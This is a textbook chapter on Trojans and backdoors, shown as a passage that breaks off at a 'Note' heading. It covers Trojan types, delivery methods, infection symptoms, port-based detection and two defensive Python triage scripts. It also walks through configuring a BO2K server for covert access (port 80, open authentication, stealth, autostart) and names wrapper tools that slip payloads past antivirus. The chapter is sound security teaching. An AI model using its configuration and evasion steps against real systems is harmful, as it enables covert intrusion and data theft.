Chapter 11. Trojans and Backdoors

ONE OF THE OLDEST and most commonly misunderstood forms of malware is the Trojan horse, or Trojan. A Trojan is a program that presents itself as something the user wants while carrying a hidden function, most often one that gives an attacker covert access to the victim's system. It is designed to be slipped onto a system quietly and to begin whatever action it is built for without drawing attention. Because Trojans are typically small and disguise themselves as, or inside, legitimate software, they are among the harder types of malicious code to notice on a system.

Trojan horses have a long history in the field of computer security. Since they first came into existence, they have represented one of the chief threats to users, as they can appear very attractive, enticing people to click on and install software that grants someone else full control of their systems. Once installed, such programs communicate over ports and protocols the system already uses, so their traffic blends in with legitimate activity; some go further and tunnel their data inside a protocol that was never meant to carry it, a covert channel, as discussed later in this chapter.

A Trojan can be defined as a program that carries something of hidden intent. Because of their ability to hide from detection, Trojans represent one of the leading threats to their targets' systems. Trojans have been hidden in a diverse group of software packages, including games, chat software, e-mail, Flash movies, and other types of software. When a program is said to be "Trojaned," it has been infected or embedded with some function that is malicious in purpose.

When a Trojan is planted on a system successfully, the intent is usually to open what is known as a backdoor. Backdoors are entry points an attacker leaves on a system to bypass its normal security measures. With one of these openings in place, attackers can gain undetected, unchecked access to a system for any purpose they intend, which is typically some sort of remote access. This lets attackers steal information, control a system remotely, upload files, and even use one system to attack another.

Included in the discussion of Trojans and backdoors are what are known as covert and overt channels. These two channels represent a mechanism for transferring information between systems and processes in ways that are supported and unsupported. Overt channels represent the path that data and other information are supposed to travel over by design. As such, the paths can be properly monitored and controlled. Covert channels are said to be in effect whenever data and other information are transferred over mechanisms not specifically designed to carry the information in question. Covert channels represent a free ride for attackers, as their activities over these paths may go completely undetected.

In this chapter we will discuss the various mechanisms that an attacker can use to gain control of, maintain control of, and transfer information to and from a victim system.

Significance of Trojans

Trojans are one of the oldest mechanisms used to compromise a computer system and are still one of the more effective methods of doing so. When planned and implemented correctly, a Trojan can grant access to a system on behalf of the attacker, allowing all sorts of activities to take place.

Software in the Trojan category represents one of the biggest dangers to the end user or owner of a system. Users can be easily coerced into installing or running software that looks legitimate but hides a payload that does something unwanted, such as opening up avenues that an attacker can use. Further complicating things is the fact that Trojans operate on a principle that can be summed up as "permitting what you cannot deny"; in other words, they use ports and mechanisms that you have to leave open for the system to function normally, such as TCP port 80 (HTTP) or 21 (FTP). A Trojan can be configured to listen or call out on one of these permitted ports rather than on a port the attacker expects to be filtered, so a firewall rule that simply blocks "unusual" ports does nothing against it.

The list of pieces of software that can be Trojaned is endless. It includes anything that the creator believes will entice the victim to open the software. Applications such as games, chat software, media players, screen savers, and other similar types have been Trojaned. For example, an attacker may choose a popular downloadable game as a distribution method by downloading it, infecting it, and posting it on a discussion group. By choosing a popular piece of software that people will willingly download, the attacker increases the chances of higher infection rates.

A hacker may have several goals in mind when creating a Trojan, but typically it is to maintain access for later usage. For example, an attacker may compromise a system and install a Trojan that will leave a backdoor on the system.

Types of Trojans include:

  • Remote access—Remote access Trojans (RAT) are designed to give an attacker control over a victim's system. Two well-known members of this class are the SubSeven program and its cousin Back Orifice. Typically members of this class work in two components: a server, which runs on the victim's system, and a client, which is the attacker's control console.

  • Data sending—Trojans of this type are designed to capture and redirect data to an attacker. The types of data these Trojans can capture are varied but can include anything from keystrokes and passwords to any other type of information that may be generated or reside on the system. This information can be logged to a hidden file on the system or sent out, for example to a predefined e-mail account.

  • Destructive—Software in this category is designed to do one thing and one thing only: destroy data and kill a system.

  • Denial of service (DoS)—Software in this category is designed to target a specific service or system, overwhelm it, and shut it down.

  • Proxy—Trojans that fit into this category allow attackers to use a victim's system to perform their own activities. Using a victim's system to carry out a crime makes locating the actual perpetrator much more difficult.

  • FTP—Software in this category is designed to set up the infected system as an FTP server. An infected system will become a server hosting all sorts of data including illegal software, pirated movies and music or, as has been observed in some cases, pornography.

  • Security software disablers—Trojans of this type are designed to specifically target the security countermeasures present on a system and shut them down. On a system infected with this software, mechanisms such as antivirus, firewall, and system updates are often disabled. Trojans often use this strategy first to infect a system and then perform activities from one of the other categories, such as setting up a proxy server or FTP site.

Computer Trojans emerged in the mid-1980s as a way to infect software and distribute the infected payload to different systems without raising suspicion. In most situations, but not all, Trojans are intended to allow an attacker to remotely access or control a victim's system. In the event an application that is infected with a Trojan is installed on a target system, the attacker can not only obtain remote access, but also perform other operations designed to gain control of the infected system. In fact the operations that an attacker can perform are limited by only two factors: the privileges of the user account it is running under and the design the author has chosen to implement. By infecting a system with a Trojan, an attacker opens up a backdoor to the system that he or she can take advantage of.

Methods to Get Trojans onto a System

Hackers have a range of options, from high-tech to low, for getting Trojans onto their victims' computers. A common theme among these methods is that they play on the human desire to get something for nothing. Here are the common methods for installing a Trojan:

  • Peer-to-peer networks (P2P)—This delivery mechanism has become very popular due to the increased number of individuals using these networks to obtain software free of charge. An attacker can easily grab a legitimate piece of software, embed a Trojan in it, post it on a file-sharing network, and wait for victims to download it.

  • Instant messaging (IM)—Delivering malicious software via IM has been very common because it is easy: IM clients have historically had few security controls, and users tend to trust a file or link that arrives from a contact's account, even when that account has been compromised.

  • Internet Relay Chat (IRC)—IRC is commonly used to deliver messages and software because of its widespread use and because new users can easily be enticed into downloading software offered in a channel.

  • E-mail attachments—With the rise of e-mail as a communication medium, the practice of using it to distribute Trojans also rose. Trojans have been distributed in this medium as attachments and as clickable links.

  • Physical access—Decidedly low tech but no less effective is physical access to a system. Once an attacker gains physical access, it becomes relatively easy to install the Trojan and compromise the system.

  • Browser defects—With many users forgetting to or choosing not to update their browsers as soon as updates are released, distribution of Trojans becomes easier. An unpatched browser or plug-in contains known vulnerabilities that a malicious or compromised Web page can exploit to run code without any prompt (a so-called drive-by download), so the Trojan installs with no action from the user beyond visiting the page.

  • Freeware—You don't get something for nothing, and thinking you are getting free software can lead to disaster. Downloading software for no charge from unknown or untrusted sources can mean that you have downloaded something nastier, such as a Trojan-infested application.

Operations that could be performed by a hacker on a target computer system include:

  • Data theft

  • Installation of software

  • Downloading or uploading of files

  • Modification of files

  • Installing keyloggers

  • Viewing the system user's screen

  • Consuming computer storage space

  • Crashing the victim's system

Trojans are commonly lumped into the same category as viruses, but this is not entirely correct. Trojans are similar to viruses in that they ride inside another file that serves as a carrier, but unlike viruses they are not designed to replicate: every new infection requires a victim to obtain and run the carrier. The distribution method is therefore simple. The Trojan is attached to another file, and that file is retrieved and executed by an unsuspecting victim. Once this occurs, the Trojan typically grants access to the attacker or performs some other action on the attacker's behalf.

Many Trojans need instructions from the attacker, supplied either at build time or after infection, to fully carry out their purpose. In practice, authors rarely distribute their own code beyond the initial release. Once attackers release their code into the world, they switch from the distribution phase to the listening phase, in which the Trojan "calls home" to indicate that it has infected a system and awaits instructions.

Targets of Trojans

The more we all use the Internet to communicate, shop, and even store our stuff, the more we generate targets for hackers and their Trojan horses. Here are some of the targets that tempt hackers:

  • Credit card data—Credit card data and personal information are a tempting and all too common target. Upon obtaining this information an attacker can embark on a shopping spree, purchasing any type of product or service they desire, such as Web services, games, or other products.

  • Passwords—Passwords are always an attractive target for attackers. If they obtain this sort of information, it can prove devastating to the victim. Since most individuals reuse passwords over and over again, getting one password from an individual can easily open many doors. A Trojan with keylogging capability can capture everything from e-mail and Internet account passwords to banking credentials.

  • Insider information—Confidential or insider information is another target for an attacker. An attacker may very well use a Trojan to gain information from an organization that may not otherwise be public.

  • Data storage—In some cases a system that becomes the unlucky recipient of a Trojan is turned into a storage point without its owner's knowledge. Uploading data to an infected system can turn that system into a server that can host any type of content. Infected hosts have been known to hold illegal music or movies, pirated software, pornography, financial data, or even child pornography.

  • Random acts of mischief—In some cases the intent is simply to irritate or annoy the system owner; the hacker may just want to have some fun at the victim's expense.

Note

Trojans rely on the fact that they look like something the user wants, such as a game or piece of free software. When users install or run this software they run the main program, but unbeknown to them, the Trojan is running in the background.

The first widespread Trojans appeared between 1994 and 1998 as distribution methods became more robust (think Internet). Prior to this point the software was distributed via bulletin board systems (BBSs), floppy disks, and similar methods. Since the early days of Trojans the sophistication of the software has increased, as has the number of reported incidents associated with this type of code. Of course, as Trojans increased in sophistication, so did the methods used to thwart them, such as antivirus software and other tools.

Known Symptoms of an Infection

So what are the symptoms or effects of a Trojan infection? In the event that your antivirus does not detect and eliminate this type of software, it helps to be able to identify some of the signs of a Trojan infection. Bear in mind that many of the items below are the "prank" features built into classic remote access Trojans such as NetBus and Back Orifice; a Trojan built for theft or quiet remote access will usually show none of them, so the absence of symptoms is not evidence of a clean system:

  • The CD drawer of a computer opens and closes.

  • The computer screen changes, such as by flipping or inverting.

  • Screen settings change by themselves.

  • Documents print with no explanation.

  • The browser is redirected to a strange or unknown Web page.

  • Windows color settings change.

  • Screen saver settings change.

  • Right and left mouse buttons reverse their functions.

  • The mouse pointer disappears.

  • The mouse pointer moves in unexplained ways.

  • The start button disappears.

  • Chat boxes appear on the infected system.

  • The Internet Service Provider (ISP) reports that the victim's computer is running port scans.

  • People chatting appear to know detailed personal information.

  • The system shuts down by itself.

  • The taskbar disappears.

  • The account passwords are changed.

  • Legitimate accounts are accessed without authorization.

  • Unknown purchase statements appear in credit card bills.

  • Modems dial and connect to the Internet by themselves.

  • Ctrl+Alt+Del stops working.

  • When the computer is shut down or rebooted, a message states that other users are still connected.

Detection of Trojans and Viruses

There are several methods of detecting if a Trojan is present on a system, but few prove more useful to the security professional than looking at ports, so let's go back to a topic that was discussed in a previous chapter.

If Trojans are going to give an attacker the ability to attach to a system remotely, they are going to need to listen on a port. Some Trojans use well-known default ports that can be easily detected; others may use nonstandard or obscure ports that will need a little extra investigation to determine what is listening (whether it is a legitimate service or something else). Table 11-1 lists some of the common ports that are used by some classic Trojans. Note that several entries (Citrix ICA, NetMeeting, pcAnywhere, ReachOut, Remotely Anywhere, Timbuktu, VNC, and Netcat) are legitimate remote-administration tools; they appear because an attacker can plant one of them as a backdoor just as easily as a purpose-built Trojan, and because they show that a port number alone proves nothing. A listener on 5631 is fine on a help-desk machine that is supposed to run pcAnywhere and suspicious everywhere else; what matters is whether the listener belongs on that host. (VNC's remote-framebuffer service itself listens on 5900 and up; 5800 and 5801 are its browser-based viewer ports.)

Table 11-1. Some classic Trojans and the ports and protocols they use.

TROJAN                  PROTOCOL                                   PORTS
Back Orifice            UDP                                        31337 or 31338
Back Orifice 2000       TCP/UDP                                    54320/54321
Beast                   TCP                                        6666
Citrix ICA              TCP/UDP                                    1494
Deep Throat             UDP                                        2140 and 3150
Desktop Control         UDP                                        NA
Donald Dick             TCP                                        23476/23477
Loki                    ICMP (Internet Control Message Protocol)   NA
NetBus                  TCP                                        12345 and 12346
Netcat                  TCP/UDP                                    Any
NetMeeting Remote       TCP                                        49608/49609
pcAnywhere              TCP                                        5631/5632/65301
ReachOut                TCP                                        43188
Remotely Anywhere       TCP                                        2000/2001
Remote                  TCP/UDP                                    135-1139
Whack-a-mole            TCP                                        12361 and 12362
NetBus 2 Pro            TCP                                        20034
GirlFriend              TCP                                        21544
Masters Paradise        TCP                                        3129, 40421, 40422, 40423 and 40426
Timbuktu                TCP/UDP                                    407
VNC                     TCP/UDP                                    5800/5801


Figure 11-1. Results of the netstat command.

Of the tools for detecting Trojans, one of the easiest to access is the command-line tool known as netstat. Using netstat it is possible to list the ports that are listening on a system and check each one against what is supposed to be running on that system.

In Windows at the command line you can type the following command:

netstat -an

This command will display the results shown in Figure 11-1. Adding the -o switch (netstat -ano) appends the process ID that owns each socket, and -b (which requires an elevated command prompt) shows the executable behind it; that is what you need to tie a suspicious port to a process. Bear in mind that a rootkit that hooks the system's networking APIs can hide entries from netstat, so the local view should be compared with a scan taken from another host.

Another tool that can help you locate the ports on which a Trojan is listening for instructions is nmap. With nmap you can scan a system from another host and get a report back on the ports that are listening, then investigate further to see if any unusual activity is afoot. A port that nmap sees open but netstat on the victim does not list is itself a strong sign that something on the victim is hiding.
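The following is an added example, not code from the chapter, showing the netstat triage described above as a script rather than a manual read of Figure 11-1. It parses a constructed sample of Windows "netstat -ano" output (not a real capture), checks each listener against a subset of Table 11-1, and, more usefully, against an assumed baseline of listeners that belong on that particular host. The baseline set, the sample output, and the PIDs in it are assumptions made for the example.

```python
from typing import Dict, List, Tuple

# Constructed sample of "netstat -ano" output from a Windows host; not a real capture.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       1337
  TCP    127.0.0.1:54320        0.0.0.0:0              LISTENING       2144
  TCP    192.168.1.10:49723     93.184.216.34:443      ESTABLISHED     5012
  UDP    0.0.0.0:31337          *:*                                    1337
  UDP    0.0.0.0:5353           *:*                                    1488
"""

# Subset of Table 11-1, keyed by (protocol, port).
CLASSIC_TROJAN_PORTS: Dict[Tuple[str, int], str] = {
    ("UDP", 31337): "Back Orifice", ("UDP", 31338): "Back Orifice",
    ("TCP", 54320): "Back Orifice 2000", ("UDP", 54321): "Back Orifice 2000",
    ("TCP", 6666): "Beast",
    ("UDP", 2140): "Deep Throat", ("UDP", 3150): "Deep Throat",
    ("TCP", 23476): "Donald Dick", ("TCP", 23477): "Donald Dick",
    ("TCP", 12345): "NetBus", ("TCP", 12346): "NetBus",
    ("TCP", 20034): "NetBus 2 Pro",
    ("TCP", 12361): "Whack-a-mole", ("TCP", 12362): "Whack-a-mole",
    ("TCP", 21544): "GirlFriend",
}

# Assumed baseline of listeners that belong on this particular host. Build your own from a
# clean build of the same image; "not in baseline" is the signal that matters, not the port number.
EXPECTED_LISTENERS = {("TCP", 135), ("TCP", 445), ("UDP", 5353)}


def parse_netstat(text: str) -> List[dict]:
    """Parse Windows "netstat -ano" lines into dicts. UDP rows carry no State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue                                   # headers and blank lines
        proto, local = parts[0], parts[1]
        addr, port = local.rsplit(":", 1)              # rsplit also handles [::]:135
        state = parts[3] if proto == "TCP" else "-"
        rows.append({"proto": proto, "addr": addr, "port": int(port),
                     "state": state, "pid": int(parts[-1])})
    return rows


def triage_listeners(rows: List[dict], expected=EXPECTED_LISTENERS) -> List[dict]:
    """Flag listening sockets that hit a classic Trojan port or are not in the host baseline."""
    findings = []
    for r in rows:
        if r["proto"] == "TCP" and r["state"] != "LISTENING":
            continue                                   # established/outbound sockets are not listeners
        key = (r["proto"], r["port"])
        reasons = []
        if key in CLASSIC_TROJAN_PORTS:
            reasons.append(f"port used by classic Trojan {CLASSIC_TROJAN_PORTS[key]}")
        if key not in expected:
            reasons.append('listener not in host baseline; identify the owner with tasklist /FI "PID eq <pid>"')
        if reasons:
            findings.append({**r, "reasons": reasons})
    return findings


def pids_with_multiple_flags(findings: List[dict]) -> List[int]:
    """A single process owning several flagged sockets (PID 1337 in the sample) is a strong lead."""
    counts: Dict[int, int] = {}
    for f in findings:
        counts[f["pid"]] = counts.get(f["pid"], 0) + 1
    return sorted(pid for pid, n in counts.items() if n > 1)


if __name__ == "__main__":
    hits = triage_listeners(parse_netstat(SAMPLE_NETSTAT))
    for h in hits:
        print(f'{h["proto"]} {h["addr"]}:{h["port"]} pid={h["pid"]}: ' + "; ".join(h["reasons"]))
    print("processes owning more than one flagged socket:", pids_with_multiple_flags(hits))
```

Feed it real output with netstat -ano > listeners.txt and parse the file instead of SAMPLE_NETSTAT. The Trojan table only catches attackers who kept a default port; the baseline comparison is what catches a BO2K server configured for port 80 on a host that has no business serving HTTP.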

Vulnerability Scanners

Providing an additional tool is the use of a category of software known as the vulnerability scanner. Software of this type can be used to scan a system, locate, and report back on services such as Trojans listening on the ports of a system. One of the best known scanners of this type is the tool known as Nessus.

Antivirus

One of the most widely used methods of detecting Trojans, viruses, and worms is the ubiquitous antivirus software. Software of this type scans for the signatures and behaviors of known malicious code and in turn removes and/or quarantines it on the system. Signature-based scanning only catches what the vendor has already seen, however, and a wrapped or re-encrypted Trojan may not match any signature, so antivirus should be paired with the port and process checks described above rather than relied on alone.

Trojan Tools

There exist a wide range of tools used to take control of a victim's system and leave behind a "present" for them in the form of a backdoor. We will not attempt to cover all these tools, but for reference the following list includes some of the more common ones that have been found in the wild. Note that this is not an exhaustive list and there are newer variants in existence:

  • Let me rule—A remote access Trojan authored entirely in Delphi; uses TCP port 26097 by default

  • RECUB—Remote Encrypted Callback UNIX Backdoor (RECUB) borrows its name from the UNIX world. It features RC4 encryption, code injection, and encrypted ICMP callback requests. It demonstrates a key trait of Trojan software, small size, as it tips the scale at less than 6 KB.

  • Phatbot—Capable of stealing personal information including e-mail addresses, credit card numbers, and software licensing codes. Returns this information to the attacker or requestor using a peer-to-peer (P2P) network. Phatbot also has the ability to terminate many antivirus and software-based firewall products leaving the victim open to secondary attacks.

  • Amitis—Opens up TCP port 27551 to give the hacker complete control of the victim's computer.

  • Zombam.B—Gives the attacker control of the infected computer through a Web browser. It listens on port 80 by default and was created with a Trojan generation tool known as HTTPRat. Much like Phatbot, it also attempts to terminate various antivirus and firewall processes.

  • Beast—Uses a technique known as DLL (dynamic-link library) injection. Using this technique the Trojan loads its code into an existing, legitimate process, so no separate process appears in process viewers. It is harder to detect and harder to eradicate.

  • Hard disk killer—A Trojan written to destroy a system's hard drive. When executed it will attack a system's hard drive and wipe the hard drive in just a few seconds.

Going back to something that was discussed in a previous chapter, the NULL session, this is something we can use to place a Trojan. As you read, the NULL session is a feature of Windows that allows connections under the guise of the anonymous user. With a NULL session a connection can be made to enumerate shares and services on the system for whatever goal the attacker may have, which in this chapter is to install a Trojan.

Note

Back Orifice is an older Trojan tool that is stopped by any of the major antivirus applications that are in circulation today.

Using a NULL session we will install one of the oldest and most powerful tools for gaining access to systems or performing remote administration. Back Orifice 2000 (BO2K) can be placed on a victim's system to give the attacker the ability to perform a diverse range of attacks.

The manufacturer of Back Orifice says this about BO2K:

"Built upon the phenomenal success of Back Orifice released in August 98, BO2K puts network administrators solidly back in control. In control of the system, network, registry, passwords, file system, and processes. BO2K is a lot like other major file-synchronization and remote control packages that are on the market as commercial products. Except that BO2K is smaller, faster, free, and very, very extensible. With the help of the open-source development community, BO2K will grow even more powerful. With new plug-ins and features being added all the time, BO2K is an obvious choice for the productive network administrator."

Note

Back Orifice is billed by the manufacturer as a remote administrator tool, but others will call it a Trojan instead. We will not address or attempt to settle this argument here, but we will treat the tool as a Trojan as it exhibits the behaviors associated with this class of software.

An In-Depth Look at BO2K

Whether you consider it a Trojan or a "remote administration tool," the capabilities of BO2K are fairly extensive for something of this type. This list of features is adapted from the manufacturer's Web site:

Client Features

  • Address book style server list

  • Functionality can be extended via the use of plug-ins.

  • Multiple simultaneous server connections

  • Session logging capability

Native Server Support

  • Key logging capability

  • Hypertext Transfer Protocol (HTTP) file system browsing and transfer

  • Microsoft Networking file sharing

  • Remote registry editing

  • File browsing, transfer, and management

  • Plug-in extensibility

  • Remote upgrading, installation, and uninstallation

  • Network redirection of Transmission Control Protocol/Internet Protocol (TCP/IP) connections

  • Access console programs such as command shells through Telnet

  • Multimedia support for audio/video capture, and audio playback

  • Windows NT registry passwords and Win9x screen saver password dumping

  • Process control, start, stop, list

  • Multiple client connections over any medium

  • GUI message prompts

  • Proprietary file compression

  • Remote reboot

  • Domain Name Service (DNS) name resolution

Features Added by Plug-ins

  • Cryptographically Strong Triple-DES encryption

  • Remote desktop with optional mouse and keyboard control

  • Drag and drop encrypted file transfers and Explorer-like filesystem browsing

  • Graphical remote registry editing

  • Reliable User Datagram Protocol (UDP) and Internet Control Message Protocol (ICMP) communications protocols

Back Orifice 2000 (BO2K) is a next generation tool that was designed to accept customized, specially designed plug-ins. BO2K represents a dangerous tool in the wrong hands. With the software's ability to be configured to carry out a diverse set of tasks at the attacker's behest, it can be a devastating tool. BO2K consists of two software components in the form of a client and a server.

To use the BO2K server, the configuration is as follows:

  1. Start the BO2K Wizard and click Next when the Wizard's splash screen appears.

  2. When prompted by the Wizard, enter the server executable to be edited.

  3. Choose the protocol to run the server communication over.

    The typical choice is TCP because it gives a reliable connection.

    UDP is typically used if a firewall or other security architecture needs to be traversed.

  4. After choosing to use TCP to control the BO2K server, the next screen queries the port number that will be used.

    Port 80 is generally open, and so it's the one most often used, but any open port can be used.

  5. In the next screen, enter a password that will be used to access the server.

    Note that a password can be set, but the attacker could also choose open authentication, meaning that anyone who finds the port can connect without supplying credentials of any kind.

  6. The server configuration tool is provided with the information the attacker has entered when the Wizard finishes.

  7. The server can then be configured to start when the system starts up.

    This will allow the program to restart every time the system is rebooted, preventing the program from becoming unavailable.

  8. Click Save Server to save the changes and commit them to the server.

Once the server is configured it is now ready to be installed on the victim's system. No matter how the installation is to take place, the only application that needs to be run on the target system is the BO2K executable. Once this application is run, the victim's system will have the port that was configured previously opened on their system and be ready to accept input from the attacker.

In addition, the application runs an executable file called Umgr32.exe and places it in the Windows system32 folder. If you configured the BO2K executable to run in stealth mode, it will not show up in Task Manager, as it injects itself into an existing running process to act as its cover. If stealth was not configured, the application will show up as a Remote Administration Service. Stealth or no stealth, the result is the same: the attacker now has a foothold on the victim's system.

Distribution Methods

Configuring and creating Trojans has become very simple; getting them onto the victim's system is the hard part. In today's environment users have become much more cautious than previously and generally are less likely to click on attachments and files they are suspicious of. Additionally, most systems include antivirus software designed to detect the signatures and behaviors of known Trojans. Tactics that used to work will not be as successful today.

To counter this change, tools are available that can be used to slip a dangerous payload past a victim's defenses. With the tools discussed briefly in this section together with knowledge of how a Trojan works, it is possible for even a novice to create an effective mechanism to deliver a payload on target.

Using Wrappers to Install Trojans

One class of tool used to deliver such a payload is the wrapper, also called a binder. Using a wrapper, attackers can take their intended payload and merge it with a harmless executable to create a single executable from the two. At this point, the new executable can be posted in some location where it is likely to be downloaded. Consider a situation where a would-be attacker downloads an authentic application from a vendor's Web site and uses a wrapper to merge a Trojan (for example, BO2K) into the application before posting it on a newsgroup or other location. Some more advanced wrapper-style programs can even bind together several applications instead of the two mentioned here. What looks harmless to the downloader is actually a "bomb" waiting to go off on the system. When the victim runs the bundle, the legitimate program starts as expected while the Trojan installs silently alongside it.

Note

This scenario is similar to what can and does happen with software downloaded from so-called "warez" sites. In this instance an attacker downloads a legitimate program, embeds a payload into it, and posts it on file-sharing networks such as BitTorrent. Someone looking to get the new software free instead of paying for a legitimate copy actually gets a nasty surprise.

Wrappers tend to be one of the tools of choice for script kiddies due to their relative ease of use and their overall accessibility. Hackers in this category find them effective for their purposes.

Some of the better-known wrapper programs are the following:

  • EliteWrap—EliteWrap is one of the most popular wrapping tools available due to its rich feature set that includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected. Furthermore the software can even be configured to the point of letting the attacker choose an installation directory for the payload. Finally, software wrapped with EliteWrap can be configured to install silently without any user interaction.

  • Saran Wrap—A wrapper program specifically designed to work with and hide Back Orifice, it can bundle Back Orifice with an existing program into what appears to be a standard "Install Shield" installed program.

  • Trojan Man—This wrapper merges programs and can encrypt the new package in order to bypass antivirus programs.

  • Teflon Oil Patch—Another program designed to bind Trojans to a specified file in order to defeat Trojan detection applications

  • Restorator—An example of an application designed originally with the best of intentions but now used for less than honorable purposes. Has the ability to add a payload to a package, such as a screen saver, before it is forwarded to the victim.

  • Firekiller 2000—A tool designed to be used with other applications when wrapped. This application is designed to disable firewall and antivirus software. Programs such as Norton Antivirus and McAfee VirusScan were vulnerable targets prior to being patched.
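Two checks a practitioner can run on a downloaded executable before trusting it follow, as an added example that is not part of the chapter or of any of the wrapper tools listed above: compare its SHA-256 with the hash the vendor publishes, and measure how much data sits after the last section declared in the PE headers (the "overlay"), which is where many binders append their payload. The sample PE is constructed in code for testing and is not a runnable program. The overlay check is a triage signal only: legitimate installers, self-extracting archives, and Authenticode-signed binaries (whose certificate table lives in the overlay) all carry one, and a wrapper that adds a section instead of appending data will not trip it.

```python
import hashlib
import struct


def sha256_hex(data: bytes) -> str:
    """Hash of the downloaded file, to compare with the hash the vendor publishes."""
    return hashlib.sha256(data).hexdigest()


def pe_overlay_size(data: bytes) -> int:
    """Bytes appended past the end of the last PE section (the overlay).
    Raises ValueError if the data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE executable (missing MZ signature)")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)        # offset of the PE header
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                        # IMAGE_FILE_HEADER
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)    # SizeOfOptionalHeader
    section_table = coff + 20 + opt_size
    end_of_image = section_table + 40 * num_sections           # at least the headers themselves
    for i in range(num_sections):
        entry = section_table + 40 * i
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each 40-byte entry
        size_raw, ptr_raw = struct.unpack_from("<II", data, entry + 16)
        end_of_image = max(end_of_image, ptr_raw + size_raw)
    return max(0, len(data) - end_of_image)


def build_sample_pe(section_bytes: bytes, overlay: bytes = b"") -> bytes:
    """Constructed minimal PE32 image with one section, for testing only; not runnable code."""
    e_lfanew, opt_size, raw_ptr = 0x40, 224, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, 1 section, no symbols, optional header size, EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic, remainder zeroed
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_bytes), 0x1000,
                          len(section_bytes), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + opt + section).ljust(raw_ptr, b"\0")
    return headers + section_bytes + overlay


def triage_download(data: bytes, vendor_sha256: str) -> list:
    """Reasons a downloaded executable deserves a closer look; an empty list means nothing was seen."""
    reasons = []
    if sha256_hex(data) != vendor_sha256.lower():
        reasons.append("SHA-256 does not match the vendor-published hash")
    overlay = pe_overlay_size(data)
    if overlay:
        reasons.append(f"{overlay} bytes of data appended after the last section (overlay)")
    return reasons


if __name__ == "__main__":
    genuine = build_sample_pe(b"\xC3" * 100)                  # what the vendor shipped
    published = sha256_hex(genuine)                           # the hash on the vendor's site
    wrapped = build_sample_pe(b"\xC3" * 100, b"PAYLOAD" * 50)  # same program with a bound payload
    print("genuine :", triage_download(genuine, published))
    print("wrapped :", triage_download(wrapped, published))
```

The hash comparison is the decisive check whenever the vendor publishes one; the overlay measurement is for the common case where no reference hash exists and you need a reason to look harder at a file before running it.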

Trojan Construction Kits

One of the other tools that have emerged over the past few years is the Trojan construction kit. The purpose of these kits is to assist in the development of new Trojans. The emergence of these kits has made the process of creating Trojans so easy that even those with knowledge equivalent to the average script kiddie can create new and dangerous entities without much effort at all.

Several of these tools are shown in the following:

  • The Trojan construction kit—One of the best examples of a relatively easy to use, but potentially destructive, tool. This kit is command line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands. With a little bit of effort it is possible to build a Trojan that can engage in such destructive behavior as destroying partition tables, master boot records (MBRs), and hard drives.

  • Senna Spy—Another Trojan creation kit that is capable of custom options, such as file transfer, executing DOS commands, keyboard control, and list and control processes.

  • Stealth tool—A program used not to create Trojans, but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and combining files.

Backdoors

Many attackers gain access to their target system through something known as a backdoor. The owner of a system compromised in this way may have no indication that someone else is even using the system.

Typically a backdoor when implemented will achieve one or more of three key goals:

  • Provide the ability to access a system regardless of security measures that an administrator may take to prevent such access

  • Provide the ability to gain access to a system while keeping a low profile. This would allow an attacker to access a system and circumvent logging and other detective methods.

  • Provide the ability to access a system with minimal effort in the minimum amount of time. Under the right conditions a backdoor will allow the attacker to gain access to a system without having to "re-hack."

Some common backdoors that are placed on a system are of the following types and purposes:

  • Password-cracking backdoor—Backdoors of this type rely on an attacker uncovering and exploiting weak passwords chosen by the system owner or its users. Owners who fail to follow accepted guidelines for strong passwords are vulnerable to this attack. A password-cracking backdoor may in fact be the first thing an aggressor attempts, because it provides access through a known, legitimate account. If the attacker has cracked more than one account, the system owner may find one of them and shut it down, but the attacker still has access through the others.

  • Rootkits—Another type of backdoor is created by replacing existing files on the system with the attacker's own versions. Using this technique an attacker can replace key system files and therefore alter the behavior of the system at a fundamental level. The specially designed software that performs this replacement is known as a rootkit. Once the replacement has been carried out the system no longer behaves as designed, and any information obtained from it (process lists, directory listings, network statistics, logs) may no longer be trustworthy.

  • Services backdoor—Network services are another target for attack and modification. Understanding how a service runs is important to understanding this attack. When a service runs, as explained previously, it listens on a port such as 80 or, for a backdoor, an unusual one such as 666. Once a service is answering on a port, an attacker can connect to it and issue commands to the service that has been compromised. There are different ways to get the compromised service onto the system, but in every case the service installed is one the attacker has modified and configured for his or her purpose.

  • Process-hiding backdoors—An attacker who wants to stay undetected for as long as possible will typically take the extra step of hiding the software he or she is running. A compromised service, a password cracker, sniffers, and rootkits are all items an attacker will want to conceal to avoid detection and removal. Techniques include renaming a package to the name of a legitimate program or altering other files on the system so that the attacker's programs are not detected and keep running.

Once a backdoor is in place, an attacker can access and manipulate the system at will.

Covert Communication

An item of concern for a security professional is the covert channel and the danger it poses. A covert channel transfers information through a mechanism that was not designed for that purpose. When a covert channel is in use, traffic is typically flowing in the open, but hidden inside that traffic is the information the sender and receiver wish to keep confidential. The difficulty for the defender is that unless you are looking specifically for the hidden data, it is easy to miss.

Note

